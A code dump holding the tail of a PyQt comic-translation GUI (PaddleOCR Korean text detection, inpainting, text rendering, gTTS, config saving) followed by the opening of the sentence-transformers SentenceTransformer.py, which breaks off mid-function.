det_limit_type='max', # 限制输入图片的大小,可选参数为limit_type[max, min] 一般设置为 32 的倍数,如 960。
ir_optim=False,
use_fp16=False, # 16位半精度
use_tensorrt=False, # 使用张量
gpu_mem=6000, # 初始化占用的GPU内存大小
cpu_threads=20,
enable_mkldnn=True, # 是否선택mkldnn
max_batch_size=512, # 图片尺寸最大大小
cls_model_dir='paddleocr/model/cls',
# cls模型位置
# image_dir="", # 通过命令行调用时间执行预测的图片或文件夹路径
det_algorithm='DB', # 使用的检测算法类型DB/EAST
det_model_dir='paddleocr/model/det/det_infer',
# 检测模型所在文件夹。传参方式有两种,1. None: 自动下载内置模型到 ~/.paddleocr/det;2.自己转换好的inference模型路径,模型路径下必须包含model和params文件
# DB(还有east,SAST)
det_db_thresh=0.3, # DB模型输出预测图的二值化阈值
det_db_box_thresh=0.6, # DB模型输出框的阈值,低于此值的预测框会被丢弃
det_db_unclip_ratio=1.3, # DB模型输出框扩大的比例
use_dilation=True, # 缩放图片
det_db_score_mode="fast", # 计算分数모드,fast对应原始的rectangle方式,slow对应polygon方式。
# 文本识别器的参数
rec_algorithm='CRNN', # 使用的识别算法类型
rec_model_dir='paddleocr/model/rec/ko_rec_infer',
# 识别模型所在文件夹。传承那方式有两种,1. None: 自动下载内置模型到 ~/.paddleocr/rec;2.自己转换好的inference模型路径,模型路径下必须包含model和params文件
# rec_image_shape="3,32,320", # 识别算法的输入图片尺寸
# cls_batch_num=36, #
# cls_thresh=0.9, #
lang='korean', # 语言
det=True, # 检测文字位置
rec=True, # 识别文字内容
use_angle_cls=False, # 识别竖排文字
rec_batch_num=36, # 进行识别时,同时前向的图片数
max_text_length=30, # 识别算法能识别的最大文字长度
# rec_char_dict_path='', # 识别模型字典路径,当rec_model_dir使用方自己模型时需要
use_space_char=True, # 是否识别空格
)
self.ui.actionko.setChecked(True)
self.state.mod_ready = True
self.ui.label_4.setText(f'{language}')
self.var.img_language = language
def change_out_language(self, language):
self.ui.actioncn.setChecked(False)
self.ui.actionen_2.setChecked(False)
self.ui.actionKorean.setChecked(False)
if language == 'cn':
self.var.word_language = 'zh-CN'
self.ui.actioncn.setChecked(True)
elif language == 'en':
self.var.word_language = 'en'
self.ui.actionen_2.setChecked(True)
elif language == 'ko':
self.var.word_language = 'ko'
self.ui.actionKorean.setChecked(True)
print(f'Info: 출력 언어{self.var.word_language}')
self.config_save('word_language', self.var.word_language)
# 读取图片
def change_img(self, s):
if self.state.task_num != self.state.task_end:
if not messagebox.askyesno('제시', '현재 작업 중입니다. 대기열을 비울까요?'):
return
self.state.task_num = 0
self.state.task_end = 0
self.memory.task_out = ''
self.memory.task_name = []
self.memory.task_img = []
if s:
path = filedialog.askdirectory()
if path == '':
return
files = []
for ext in (
'*.BMP', '*.DIB', '*.JPEG', '*.JPG', '*.JPE', '*.PNG', '*.PBM', '*.PGM', '*.PPMSR', '*.RAS',
'*.TIFF',
'*.TIF', '*.EXR', '*.JP2', '*.WEBP'):
files.extend(glob.glob(os.path.join(path, ext)))
files.sort(key=lambda x: int("".join(list(filter(str.isdigit, x))))) # 文件名按数字排序
self.memory.task_out = os.path.dirname(path) + '/out/'
for file_path in files:
try:
try:
img = cv2.imread(file_path)
height, width, channel = img.shape
except:
img = self.cv2_imread(file_path)
height, width, channel = img.shape
if channel == 1:
img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
self.memory.task_img.append(img)
self.state.task_num += 1
self.memory.task_name.append(os.path.basename(file_path))
except:
messagebox.showerror(title='Error', message=f'{file_path}그림 읽기Error')
if self.state.task_num == 0:
self.panel_clean()
print(f'War:그림이 감지되지 않음')
else:
self.panel_shownext()
print(f'Info:그림 가져오기{self.state.task_num}성공')
else:
filetypes = [("支持格式",
"*.BMP;*.DIB;*.JPEG;*.JPG;*.JPE;*.PNG;*.PBM;*.PGM;*.PPMSR;*.RAS','.TIFF','.TIF;*.EXR;*.JP2;*.WEBP")]
path = filedialog.askopenfilename(title='단일 사진 선택', filetypes=filetypes)
if path == '':
return
root, ext = os.path.splitext(os.path.basename(path))
try:
try:
img = cv2.imread(path)
height, width, channel = img.shape
except:
img = self.cv2_imread(path)
height, width, channel = img.shape
if channel == 1:
img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
self.memory.task_img.append(img)
self.state.task_num = 1
self.state.task_end = 0
self.memory.task_out = os.path.dirname(path)
self.memory.task_name = []
self.memory.task_name.append(f'{root}_re{ext}')
self.panel_shownext()
print(f'Info:그림 가져오기{self.state.task_num}성공')
except:
messagebox.showerror(title='Error', message=f'{path}그림 읽기Error')
self.state.task_num = 0
self.panel_clean()
if self.state.task_num > 0:
self.ui.img.flag_switch = True
self.ui.pushButton_4.setEnabled(True)
self.ui.pushButton_14.setEnabled(True)
self.ui.pushButton_12.setEnabled(True)
self.ui.pushButton_9.setEnabled(True)
self.ui.pushButton_6.setEnabled(True)
# 读取字体
def change_font(self):
filetypes = [("支持格式", "*.TTF;*.TTC;*.OTF")]
path = filedialog.askopenfilename(title='选择字体', filetypes=filetypes, initialdir='./covermaker/fonts')
if path == '':
return
else:
if not os.path.exists(f'covermaker/fonts/{os.path.basename(path)}'):
shutil.copyfile(f'{path}', f'covermaker/fonts/{os.path.basename(path)}')
self.var.word_conf.font = f'{os.path.basename(path)}'
self.ui.label_6.setText(f'{os.path.basename(path)}')
self.config_save('font', self.var.word_conf.font)
# 清空面板
def panel_clean(self):
self.ui.img.clear()
self.ui.img.setFixedWidth(450)
self.ui.img.setFixedHeight(696)
self.ui.img.setText(
'1.왼쪽상단에 만화를 가져옵니다 번역할 언어를 선택하세요\n2.자동 번역이나 수동 영역 선택 \n3. 수동 번역은 오른쪽 하단에 그림 순서와 이름 \n4. 환경 요구사항은 네트워크가 필수입니다 \n5.인터넷이 안될경우 번역을 할수없으니 주의바합니다')
self.ui.img.setStyleSheet('background-color:rgb(255,255,255);\ncolor:rgba(0,0,0,255);')
self.ui.label_3.setText(f'{self.state.task_end}/{self.state.task_num}')
self.memory.action_save_num = 0
self.memory.action_save_img = []
# 更新面板
def panel_shownext(self):
self.ui.img.setStyleSheet('background-color:rgb(255,255,255);\ncolor:rgba(0,0,0,0);')
img = self.memory.task_img[self.state.task_end]
self.memory.img_show = img.copy()
self.memory.img_mark_more, self.memory.img_mark, self.memory.img_textlines = textblockdetector(img)
self.memory.img_mark_more[self.memory.img_mark_more != 0] = 255
height, width, channel = img.shape
self.state.img_half = False
if height > 900 or width > 1500:
self.state.img_half = True
height //= 2
width //= 2
else:
self.state.img_half = False
self.ui.img.setFixedWidth(width)
self.ui.img.setFixedHeight(height)
self.show_img()
self.ui.label_3.setText(f'{self.state.task_end}/{self.state.task_num}')
self.memory.img_repair = None
self.memory.action_save_num = 0
self.memory.action_save_img = []
# 保存图片
def save(self):
self.state.action_running = False
if not os.path.exists(self.memory.task_out):
os.mkdir(self.memory.task_out)
name = self.memory.task_out + "/" + self.memory.task_name[self.state.task_end]
# cv2.imwrite(name, self.memory.img_show)
cv2.imencode('.jpg', self.memory.img_show)[1].tofile(name)
self.state.task_end += 1
self.ui.img.update()
messagebox.showinfo(title='성공', message=f'이미지 저장 완료\n{self.memory.task_out}\\{name}')
self.ui.textEdit_3.setText('')
print(f'Info:이미지 저장 완료\n{name}')
if self.state.task_end < self.state.task_num:
self.panel_shownext()
else:
self.panel_clean()
self.ui.img.flag_switch = False # 矩形绘制锁
self.ui.pushButton_4.setEnabled(False)
self.ui.pushButton_14.setEnabled(False)
self.ui.pushButton_12.setEnabled(False)
self.ui.pushButton_9.setEnabled(False)
self.ui.pushButton_7.setEnabled(False)
self.ui.pushButton_6.setEnabled(False)
self.ui.pushButton_5.setEnabled(False)
self.ui.pushButton_15.setEnabled(False)
self.ui.pushButton.setEnabled(False)
self.ui.pushButton_3.setEnabled(False)
# 输出文字方向
def change_word_way(self):
if self.var.word_way == 1:
self.var.word_way = 2
self.ui.pushButton_2.setText('배열:가로')
print('Info:텍스트 가로 출력')
else:
self.var.word_way = 1
self.ui.pushButton_2.setText('배열:수직')
print('Info:텍스트 수직 출력')
self.config_save('word_way', self.var.word_way)
# 文字定位모드
def change_word_mod(self):
if self.var.word_mod == 'auto':
self.var.word_mod = 'Handmade'
print('Info:텍스트 위치 설정 모드: 수동')
self.ui.pushButton_13.setText('위치:수동')
else:
self.var.word_mod = 'auto'
print('Info:텍스트 위치 설정 모드: 자동')
self.ui.pushButton_13.setText('위치:자동')
self.config_save('word_mod', self.var.word_mod)
# 자간设置
def new_character_style_window(self):
Window = CharacterStyle()
Window.ui.pushButton_1.setStyleSheet(
f'background-color: {self.var.word_conf.color};border-width:0px;border-radius:11px;')
Window.ui.lineEdit_3.setText(str(self.var.word_conf.stroke_width))
Window.ui.pushButton_3.setStyleSheet(
f'background-color: {self.var.word_conf.stroke_fill};border-width:0px;border-radius:11px;')
Window.ui.lineEdit.setText(str(self.var.word_conf.letter_spacing_factor))
Window.ui.lineEdit_2.setText(str(self.var.word_conf.line_spacing_factor))
Window.stroke_fill = self.var.word_conf.stroke_fill
Window.color = self.var.word_conf.color
Window.exec()
if Window.re[0]:
self.var.word_conf.letter_spacing_factor = Window.re[1]
self.var.word_conf.line_spacing_factor = Window.re[2]
self.var.word_conf.color = Window.re[3]
self.var.word_conf.stroke_width = Window.re[4]
self.var.word_conf.stroke_fill = Window.re[5]
print(f'Info:자간{Window.re[1]}\n텍스트 색상{Window.re[3]}\n행간{Window.re[2]}\n그림자 색상{Window.re[5]}\n그림자너비{Window.re[4]}')
self.config_save('line_spacing_factor', self.var.word_conf.line_spacing_factor)
self.config_save('letter_spacing_factor', self.var.word_conf.letter_spacing_factor)
self.config_save('stroke_fill', self.var.word_conf.stroke_fill)
self.config_save('color', self.var.word_conf.color)
self.config_save('stroke_width', self.var.word_conf.stroke_width)
Window.destroy()
# 图像修复开关
def change_img_re(self):
if self.var.img_re_bool:
self.var.img_re_bool = False
self.ui.pushButton_8.setText('선택')
print('Info:이미지복원닫기')
print(' 그림복원모드: 배경색칠')
else:
self.var.img_re_bool = True
self.ui.pushButton_8.setText('선택')
print('Info:이미지복구열기')
if self.var.img_re_mod == 1:
print(' 이미지 복구 모드: 표준 텍스트 복구')
elif self.var.img_re_mod == 2:
print(' 그림 복원 모드: 표준 텍스트 복원 확장 1')
elif self.var.img_re_mod == 3:
print(' 그림 복원 모드: 표준 텍스트 복원 확장 2')
elif self.var.img_re_mod == 4:
print(' 그림 복원 모드: 텍스트 복원 강화')
elif self.var.img_re_mod == 5:
print(' 그림 복원 모드: 텍스트 복원 확장 1')
elif self.var.img_re_mod == 6:
print(' 그림 복원 모드: 텍스트 복원 확장 2')
self.config_save('img_re_bool', self.var.img_re_bool)
# 图像修复모드
def change_img_mod(self):
if self.var.img_re_mod == 6:
self.var.img_re_mod = 1
else:
self.var.img_re_mod += 1
if self.var.img_re_mod == 1:
print('Info:그림 복원 모드: 표준 텍스트 복원')
elif self.var.img_re_mod == 2:
print('Info:그림 복원 모드: 표준 텍스트 복원 확장 1')
elif self.var.img_re_mod == 3:
print('Info:그림 복원 모드: 표준 텍스트 복원 확장 2')
elif self.var.img_re_mod == 4:
print('Info:그림 복원 모드: 텍스트 복원 강화')
elif self.var.img_re_mod == 5:
print('Info:그림 복원 모드: 텍스트 복원 확장 1')
elif self.var.img_re_mod == 6:
print('Info:그림 복원 모드: 텍스트 복원 확장 2')
self.memory.img_repair = None
self.config_save('img_re_mod', self.var.img_re_mod)
def doit(self):
if self.state.action_running:
self.action_save()
if self.state.text_running:
self.do_add_text()
else:
self.do_translation()
def do_translation(self):
pos = self.memory.textline_box[0]
if self.var.img_re_bool:
if self.memory.img_repair is None:
self.img_repair()
roi = self.memory.img_repair[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]]
self.memory.img_show[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]] = roi
else:
white = np.zeros([pos[3], pos[2], 3], dtype=np.uint8) + 255
self.memory.img_show[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]] = white
print('Info:이미지 복원 완료')
# 添加文字
text = self.ui.textEdit_2.toPlainText()
if text.replace(" ", "") != '':
img = self.memory.img_show.copy()
pos = self.memory.textline_box[0]
if pos is None: print('Error:boxError')
self.var.word_conf.box = conf.Box(pos[0], pos[1], pos[2], pos[3])
if self.var.word_way == 2 or self.var.word_language == 'en' or self.var.word_language == 'ko':
if self.var.word_way == 1:
print('War:현재 언어는 세로 문자를 지원하지 않습니다.')
self.var.word_conf.dir = 'h'
else:
self.var.word_conf.dir = 'v'
try:
img = render.Render(img)
img = img.draw(text, self.var.word_conf)
self.memory.img_show = img.copy()
except:
print('Error:입력 오류')
else:
print('War:입력되지 않은 텍스트')
self.show_img()
del (self.memory.textline_box[0])
if len(self.memory.textline_box) == 0:
self.state.action_running = False
self.ui.pushButton_5.setEnabled(False)
self.ui.pushButton.setEnabled(False)
self.ui.pushButton_3.setEnabled(False)
self.ui.pushButton_15.setEnabled(False)
self.ui.textEdit.setText('')
self.ui.textEdit_2.setText('')
else:
box = self.memory.textline_box[0]
result = self.memory.model(self.memory.img_show[box[1]:box[3] + box[1], box[0]:box[2] + box[0]])
self.ui.textEdit.setText(result)
if result.replace(" ", "") == '':
print('War:문자인식이 이상합니다. 수동으로 입력해 주세요')
self.ui.textEdit_2.setText('')
else:
with eventlet.Timeout(20, False):
self.ui.textEdit_2.setText(translate(result, f'{self.var.word_language}', "auto"))
if self.ui.textEdit_2.toPlainText() == '':
self.ui.textEdit_2.setText('번역시간초과')
def do_add_text(self):
text = self.ui.textEdit_2.toPlainText()
if text.replace(" ", "") != '':
img = self.memory.img_show.copy()
pos = self.memory.textline_box[0]
if pos is None: print('Error:boxError')
self.var.word_conf.box = conf.Box(pos[0], pos[1], pos[2], pos[3])
if self.var.word_way == 2 or self.var.word_language == 'en' or self.var.word_language == 'ko':
if self.var.word_way == 1:
print('War:현재 언어는 세로 문자를 지원하지 않습니다.')
self.var.word_conf.dir = 'h'
else:
self.var.word_conf.dir = 'v'
try:
img = render.Render(img)
img = img.draw(text, self.var.word_conf)
self.memory.img_show = img.copy()
except:
print('Error:입력 오류')
# 显示图像
self.show_img()
else:
print('War:입력되지 않은 텍스트')
self.ui.textEdit.setText('')
self.ui.textEdit_2.setText('')
self.state.text_running = self.state.action_running = False
self.ui.pushButton_5.setEnabled(False)
self.ui.pushButton_15.setEnabled(False)
self.ui.pushButton.setEnabled(False)
self.ui.pushButton_3.setEnabled(False)
def closeit(self):
self.state.action_running = False
self.ui.textEdit.setText('')
self.ui.textEdit_2.setText('')
self.state.action_running = False
self.ui.pushButton_5.setEnabled(False)
self.ui.pushButton_15.setEnabled(False)
self.ui.pushButton.setEnabled(False)
self.ui.pushButton_3.setEnabled(False)
# 翻译选中内容
def translation_img(self):
if not self.state.mod_ready:
print('Error:모델이 올바르게 로드되지 않음')
return
if not self.state.action_running:
pos = self.get_pos()
if pos is None:
print('Error:boxError')
return
textline_box = []
self.memory.textline_box = []
for i in self.memory.img_textlines:
if compute_iou([i.xyxy[0], i.xyxy[1], i.xyxy[2], i.xyxy[3]],
[pos[0], pos[1], pos[0] + pos[2], pos[1] + pos[3]]) > 0.6:
textline_box.append([i.xyxy[0], i.xyxy[1], i.xyxy[2] - i.xyxy[0] + 3, i.xyxy[3] - i.xyxy[1]])
if len(textline_box) == 0:
self.memory.textline_box.append(pos)
box = pos
print('War:텍스트 위치 이상 감지 \n 강화판 그림 복원 (또는 백색) 을 사용하는 것을 추천합니다.')
elif len(textline_box) == 1:
box = pos
if self.var.word_mod == 'Handmade':
self.memory.textline_box.append(pos)
else:
self.memory.textline_box.append(textline_box[0])
print('Info:검사에 성공했습니다. 번역을 확인하십시오.')
elif len(textline_box) > 1:
for i in textline_box:
self.memory.textline_box.append(i)
box = textline_box[0]
print('Info:현재 영역에 여러 문장이 있습니다 \n 문자 출력 강제 자동 \n 번역을 확인하십시오')
result = self.memory.model(self.memory.img_show[box[1]:box[3] + box[1], box[0]:box[2] + box[0]])
if self.var.img_language == 'ja':
self.ui.textEdit.setText(result)
else:
str = ''
for i in result[1]:
str = str + i[0]
result = str
self.ui.textEdit.setText(result)
if result.replace(" ", "") == '':
print('Info:문자인식이 이상합니다. 수동으로 입력해 주세요')
self.ui.textEdit_2.setText('')
else:
with eventlet.Timeout(20, False):
self.ui.textEdit_2.setText(translate(result, f'{self.var.word_language}', "auto"))
if self.ui.textEdit_2.toPlainText() =='':
self.ui.textEdit_2.setText('번역시간초과')
self.state.action_running = True
self.ui.pushButton_5.setEnabled(True)
self.ui.pushButton_15.setEnabled(True)
self.ui.pushButton.setEnabled(True)
self.ui.pushButton_3.setEnabled(True)
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
def text_add(self):
if not self.state.action_running:
pos = self.get_pos()
if pos is None: return
self.action_save()
self.memory.textline_box = []
self.memory.textline_box.append(pos)
self.ui.textEdit.setText('아래텍스트입력')
# self.ui.textEdit_2.setText('')
self.state.action_running = True
self.ui.pushButton_5.setEnabled(True)
self.ui.pushButton_15.setEnabled(True)
self.state.text_running = True
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
def text_clean(self):
if not self.state.action_running:
pos = self.get_pos()
if pos is None: return
self.action_save()
text = 0
for i in self.memory.img_textlines:
if compute_iou([i.xyxy[0], i.xyxy[1], i.xyxy[2], i.xyxy[3]],
[pos[0], pos[1], pos[0] + pos[2], pos[1] + pos[3]]) > 0.6:
text += 1
if text == 0:
print('War:현재 영역 텍스트 감지 이상 \n은 강화판 그림 복원 (또는 백색) 을 사용하는 것을 추천합니다.')
# 图像修复
if self.var.img_re_bool:
if self.memory.img_repair is None:
self.img_repair()
roi = self.memory.img_repair[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]]
self.memory.img_show[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]] = roi
else:
white = np.zeros([pos[3], pos[2], 3], dtype=np.uint8) + 255
self.memory.img_show[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]] = white
print('Info:이미지 복원 완료')
# 显示图像
self.show_img()
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
def auto_text_clean(self):
if not self.state.action_running:
self.action_save()
# 图像修复
if self.memory.img_repair is None:
self.img_repair()
self.memory.img_show = self.memory.img_repair.copy()
print('Info:이미지 복원 완료\n일부 영역은 스스로 백색해야 한다.')
# 显示图像
self.show_img()
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
# 提取box
def get_pos(self):
pos = self.memory.range_choice = self.ui.img.img_pos
if pos == [0, 0, 0, 0] or pos[2] < 2 or pos[3] < 2:
print('Error:입력 영역이 선택되지 않았습니다')
return None
if self.state.img_half:
pos = self.memory.range_choice = [pos[0] * 2, pos[1] * 2, pos[2] * 2, pos[3] * 2]
return pos
# 显示图像
def show_img(self):
if self.state.img_half:
height, width, channel = self.memory.img_show.shape
height //= 2
width //= 2
img = cv2.resize(self.memory.img_show, (width, height))
else:
img = self.memory.img_show
cv2.imwrite('save.jpg',self.memory.img_show)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
showImage = QtGui.QImage(img.data, img.shape[1], img.shape[0], img.shape[1] * img.shape[2],
QtGui.QImage.Format.Format_RGB888)
self.ui.img.setPixmap(QtGui.QPixmap.fromImage(showImage))
# 撤销
def cancel(self):
if not self.state.action_running:
self.memory.img_show = self.memory.action_save_img[self.memory.action_save_num - 1].copy()
self.memory.action_save_num -= 1
self.show_img()
print('Info:취소완료')
if self.memory.action_save_num == 0:
self.ui.pushButton_7.setEnabled(False)
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
# 保存
def action_save(self):
if len(self.memory.action_save_img) == self.memory.action_save_num:
self.memory.action_save_img.append(self.memory.img_show.copy())
else:
self.memory.action_save_img[self.memory.action_save_num] = self.memory.img_show.copy()
self.memory.action_save_num += 1
if self.memory.action_save_num > 0:
self.ui.pushButton_7.setEnabled(True)
# 图像修复,送入网络模型
def img_repair(self):
print('Info:검사중, 잠시후에 시도해줘')
if self.var.img_re_mod < 4:
mark = self.memory.img_mark
else:
mark = self.memory.img_mark_more
if self.var.img_re_mod % 3 != 1:
kernel = np.ones((5, 5), dtype=np.uint8)
mark = cv2.dilate(mark, kernel, self.var.img_re_mod % 3 - 1)
mark[mark != 0] = 255
img1 = self.memory.img_show.copy()
img1[mark > 0] = 255
self.memory.img_repair = Inpainting(img1, mark)
# 朗读
def tts(self):
from gtts.tts import gTTS
import pyglet
if self.ui.textEdit.toPlainText().isspace() != True:
try:
tts = gTTS(text=self.ui.textEdit.toPlainText(), lang=self.var.img_language)
filename = 'temp.mp3'
tts.save(filename)
music = pyglet.media.load(filename, streaming=False)
music.play()
time.sleep(music.duration)
os.remove(filename)
except:
print('War:네트워크 이상,TTS错误')
# 切换翻译모드
def change_translate_mod(self):
change_translate_mod()
if self.ui.textEdit.toPlainText().isspace() != True:
self.ui.textEdit_2.setText(translate(self.ui.textEdit.toPlainText(), f'{self.var.word_language}', "auto"))
# 参数保存
def config_save(self, parameter, value):
config = configparser.ConfigParser()
config.read('config.ini')
config.set('var', f'{parameter}', f'{value}')
with open('./config.ini', 'w+') as config_file:
config.write(config_file)
# 参数读取
def config_read(self):
config = configparser.ConfigParser()
config.read('config.ini')
self.var.img_language = config.get('var', 'img_language')
self.change_mod(self.var.img_language)
self.var.word_language = config.get('var', 'word_language')
self.change_out_language(self.var.word_language)
self.var.word_mod = config.get('var', 'word_mod')
if self.var.word_mod == 'auto':
self.ui.pushButton_13.setText('위치:자동')
else:
self.ui.pushButton_13.setText('위치:수동')
self.var.word_way = config.getint('var', 'word_way')
if self.var.word_way == 1:
self.ui.pushButton_2.setText('배열:수직')
else:
self.ui.pushButton_2.setText('배열:가로')
self.var.img_re_bool = config.getboolean('var', 'img_re_bool')
if self.var.img_re_bool:
self.ui.pushButton_8.setText('선택')
else:
self.ui.pushButton_8.setText('선택')
self.var.img_re_mod = config.getint('var', 'img_re_mod')
self.var.word_conf.font = config.get('var', 'font')
self.ui.label_6.setText(self.var.word_conf.font)
self.var.word_conf.color = config.get('var', 'color')
self.var.word_conf.stroke_width = config.getint('var', 'stroke_width')
self.var.word_conf.stroke_fill = config.get('var', 'stroke_fill')
self.var.word_conf.line_spacing_factor = config.getfloat('var', 'line_spacing_factor')
self.var.word_conf.letter_spacing_factor = config.getfloat('var', 'letter_spacing_factor')
# 자간设置窗口
class CharacterStyle(QtWidgets.QDialog):
def __init__(self):
super().__init__()
self.color = ''
self.stroke_fill = ''
self.ui = CharacterStyleDialog()
self.setWindowIcon(QtGui.QIcon('img.png'))
self.setWindowFlags(QtCore.Qt.WindowType.WindowCloseButtonHint)
self.ui.setupUi(self)
self.ui.lineEdit.setValidator(QtGui.QDoubleValidator())
self.ui.lineEdit_2.setValidator(QtGui.QDoubleValidator())
self.ui.lineEdit_3.setValidator(QtGui.QIntValidator())
self.ui.pushButton.clicked.connect(self.ok)
self.ui.pushButton_1.clicked.connect(self.change_word_colour)
self.ui.pushButton_2.clicked.connect(self.close)
self.ui.pushButton_3.clicked.connect(self.change_shadow_colour)
self.re = [False, 0, 0, '', 0, '']
def ok(self):
self.re = [True, float(self.ui.lineEdit.text()), float(self.ui.lineEdit_2.text()), self.color,
int(self.ui.lineEdit_3.text()), self.stroke_fill]
self.accept()
def close(self):
self.re = [False, 0, 0, '', 0, '']
self.reject()
def change_word_colour(self):
r = colorchooser.askcolor(title='텍스트색상')
self.color = r[1]
self.ui.pushButton_1.setStyleSheet(f'background-color: {r[1]};border-width:0px;border-radius:11px;')
def change_shadow_colour(self):
r = colorchooser.askcolor(title='그림자색상')
self.stroke_fill = r[1]
self.ui.pushButton_3.setStyleSheet(f'background-color: {r[1]};border-width:0px;border-radius:11px;')
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
app.exec()
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable
from zipfile import ZipFile
import requests
import numpy as np
import transformers
import torch
from numpy import ndarray
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
from tqdm.autonotebook import tqdm, trange
import torch.multiprocessing as mp
import math
import queue
from . import __DOWNLOAD_SERVER__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, http_get
from .datasets.EncodeDataset import EncodeDataset
from .models import Transformer, Pooling
from . import __version__
class SentenceTransformer(nn.Sequential):
def __init__(self, model_name_or_path: str = None, modules: Iterable[nn.Module] = None, device: str = None):
if model_name_or_path is not None and model_name_or_path != "":
logging.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
model_path = model_name_or_path
if not os.path.isdir(model_path) and not model_path.startswith('http://') and not model_path.startswith('https://'):
logging.info("Did not find folder {}. Assume to download model from server.".format(model_path))
model_path = __DOWNLOAD_SERVER__ + model_path + '.zip'
if model_path.startswith('http://') or model_path.startswith('https://'):
model_url = model_path
folder_name = model_url.replace("https://", "").replace("http://", "").replace("/", "_")[:250].rstrip('.zip')
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(
os.getenv('TORCH_HOME', os.path.join(
os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
default_cache_path = os.path.join(torch_cache_home, 'sentence_transformers')
model_path = os.path.join(default_cache_path, folder_name)
os.makedirs(model_path, exist_ok=True)
if not os.listdir(model_path):
if model_url[-1] == "/":
model_url = model_url[:-1]
logging.info("Downloading sentence transformer model from {} and saving it at {}".format(model_url, model_path))
try:
zip_save_path = os.path.join(model_path, 'model.zip')
http_get(model_url, zip_save_path)
with ZipFile(zip_save_path, 'r') as zip:
zip.extractall(model_path)
os.remove(zip_save_path)
except requests.exceptions.HTTPError as e:
shutil.rmtree(model_path)
if e.response.status_code == 404:
logging.warning('SentenceTransformer-Model {} not found. Try to create it from scratch'.format(model_url))
logging.warning('Try to create Transformer Model {} with mean pooling'.format(model_name_or_path))
model_path = None
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension())
modules = [transformer_model, pooling_model]
else:
raise e
except Exception as e:
shutil.rmtree(model_path)
raise e
#### Load from disk
if model_path is not None:
logging.info("Load SentenceTransformer from folder: {}".format(model_path))
if os.path.exists(os.path.join(model_path, 'config.json')):
with open(os.path.join(model_path, 'config.json')) as fIn:
config = json.load(fIn)
if config['__version__'] > __version__:
logging.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(config['__version__'], __version__))
with open(os.path.join(model_path, 'modules.json')) as fIn:
contained_modules = json.load(fIn)
modules = OrderedDict()
for module_config in contained_modules:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logging.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str], List[int]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
is_pretokenized: bool = False,
device: str = None,
num_workers: int = 0) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encode sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from conver_to_numpy
:param is_pretokenized: If is_pretokenized=True, sentences must be a list of integers, containing the tokenized sentences with each token convert to the respective int.
:param device: Which torch.device to use for the computation
:param num_workers: Number of background-workers to tokenize data. Set to positive number to increase tokenization speed
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logging.getLogger().getEffectiveLevel()==logging.INFO or logging.getLogger().getEffectiveLevel()==logging.DEBUG)
input_was_string = False
if isinstance(sentences, str): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([len(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
inp_dataset = EncodeDataset(sentences_sorted, model=self, is_tokenized=is_pretokenized)
inp_dataloader = DataLoader(inp_dataset, batch_size=batch_size, collate_fn=self.smart_batching_collate_text_only, num_workers=num_workers, shuffle=False)
iterator = inp_dataloader
if show_progress_bar:
iterator = tqdm(inp_dataloader, desc="Batches")
for features in iterator:
for feature_name in features:
features[feature_name] = features[feature_name].to(device)
with torch.no_grad():
out_features = self.forward(features)
embeddings = out_features[output_value]
if output_value == 'token_embeddings':
#Set token embeddings to 0 for padding tokens
input_mask = out_features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(embeddings.size()).float()
embeddings = embeddings * input_mask_expanded
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
